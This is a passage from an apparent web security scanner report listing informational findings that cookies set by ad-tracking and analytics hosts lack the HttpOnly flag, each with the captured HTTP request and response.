User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
9.34. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:28 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25904

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
9.35. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:16 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206896; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25837

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
9.36. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=121744&u=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F&a=2&id=63715474&p=10&v=2&inif=0&l=44&t=129&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMS=98198&-1&115183&1305033095; CMD1=AADz3E3JOYcAAcHvAANYqQEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMD2=AAFKkU3IB7EAAduQAAM1pAEBAAABPrtNyAexAAHbkAAC9aIEBAAAATk1TcgHsAAB25AAAwS1AQIAAAFNgk3IB7EAAduQAANH4QcHAAABSf1NyAewAAHbkAADWe4BAQAAAUoDTcgHsAAB25AAA1qaAQEAAAE5fk3JOggAAdd3AALYWAEBAAABTC1NyAhhAAHbkAADQI4FBQAAASyQTcgHsQAB25AAAsYoAQEAAAEuSE3IB7EAAduQAALcQgMDAAABLhhNyAexAAHbkAAC-PAHBwAAAUrTTcgHsQAB25AAA2MUBgYA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Thu, 12 May 2011 13:31:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:31:48 GMT
Content-Length: 178
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:31:48 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:31:48 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:31:48 GMT
Set-Cookie: CMST=Tcvg+U3L4UQE;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:31:48 GMT
Set-Cookie: CMSC=TcvhRA**;domain=casalemedia.com;path=/;
Set-Cookie: CMDD=AAHbkAIAAWdIAQABpAcB;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:31:48 GMT
Set-Cookie: CMD2=AAE5NU3L4UQAAduQAAMEtQIEAA**;domain=casalemedia.com;path=/;expires=Sat, 11 Jun 2011 13:31:48 GMT

document.write('<iframe src="http://cdn.optmd.com/V2/80181/197813/index.html" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');
9.37. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=114014&u=http%3A%2F%2Fcdn-bpx.a9.com%2Famzn%2Fiframe.html&a=4&id=81951206&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html?p=281;last=1094;r=a834682
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMSC=Tcvg+Q**; CMD2=AAE5NU3L4PkAAduQAAMEtQEDAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMS=107527&1305207085&98198&-1; CMST=Tcvg+U3L4S0C; CMDD=AAGkBwEAAduQAQ**; CMD1=AADz3E3L4S0AAaQHAAMfUwECAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Thu, 12 May 2011 13:33:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:47 GMT
Content-Length: 252
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:33:47 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:47 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:47 GMT
Set-Cookie: CMST=Tcvg+U3L4bsD;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:47 GMT
Set-Cookie: CMDD=AAFnSAIAAaQHAQAB25ABfad4e1a9f1208c3c0784AAAAf10*;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:47 GMT
Set-Cookie: CMD4=AAFKA03L4UAAAb1eAANamQEBAAABJ6tNy+G7AAG9XgADNYEBAQA*;domain=casalemedia.com;path=/;expires=Sat, 11 Jun 2011 13:33:47 GMT

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286382387/direct;wi.300;hi.250/01/0797372340?click=http://c.casalemedia.com/c/4/1/75691/" width="300" height="250" marginwidth="0" marginhe
...[SNIP]...
9.38. http://as.casalemedia.com/s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /s

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?s=107527&u=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&f=1&id=4136036944.972018 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMS=98198&-1&115183&1305033095; CMD1=AADz3E3JOYcAAcHvAANYqQEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMST=Tcvg+U3L4PkB; CMSC=Tcvg+Q**; CMDD=AAHbkAE*; CMD2=AAE5NU3L4PkAAduQAAMEtQEDAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 0
Content-Type: text/plain
Expires: Thu, 12 May 2011 13:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:26 GMT
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:33:26 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:26 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:26 GMT
Set-Cookie: CMST=Tcvg+U3L4aYC;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:26 GMT
Set-Cookie: CMDD=AAGkBwIAAduQAQABZ0gB;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:26 GMT

9.39. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035094&rn=1217795641&c7=http%3A%2F%2Farstechnica.com%2Fgadgets%2Fnews%2F2011%2F05%2Fmore-chromebooks-from-google-chrome-os-web-store-updates-too.ars&c8=More%20Chromebooks%20from%20Google%3B%20Chrome%20OS%2C%20Web%20S&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 13:27:58 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 13:27:58 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.40. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035951&c3=56 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:33 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 13:33:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
9.41. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035308&d.c=gif&d.o=pcwmw-pcworld&d.x=60649168&d.t=page&d.u=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:29 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 13:31:29 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
9.42. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p82806590&c3=62874418&c4=40422013&c5=1&c6=3&c7=thu%20apr%2028%2021%3A29%3A14%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN1260.cnetzdnet%2FB5448313.5%3Bsz%3D300x250%3Bpc%3Dcbs513717%3Bclick0%3Dhttp%3A%2F%2Fadlog.com.com%2Fadlog%2Fe%2Fr%3D8041%26sg%3D513717%26o%3D6037%25253A13616%25253A%26h%3Dcn%26p%3D%26b%3D2%26l%3D%26site%3D2%26pt%3D2100%26nd%3D13616%26pid%3D%26cid%3D207595%26pp%3D100%26e%3D%26rqid%3D01c13-ad-e6%3A4DCB63ED638330%26orh%3D%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3D%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3DJ-kzEAoPOk4AAFIsDHEAAABP%26t%3D2011.05.12.13.27.52%26event%3D58%2F%3Bord%3D2011.05.12.13.27.52%3F&c9=Advertisement&c10=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&c15=&1305206897365 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 13:30:29 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Sat, 11-May-2013 13:30:29 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.43. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badge.facebook.com
Path:   /badge/10042561111.528147018.1934312001.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/10042561111.528147018.1934312001.png HTTP/1.1
Host: badge.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
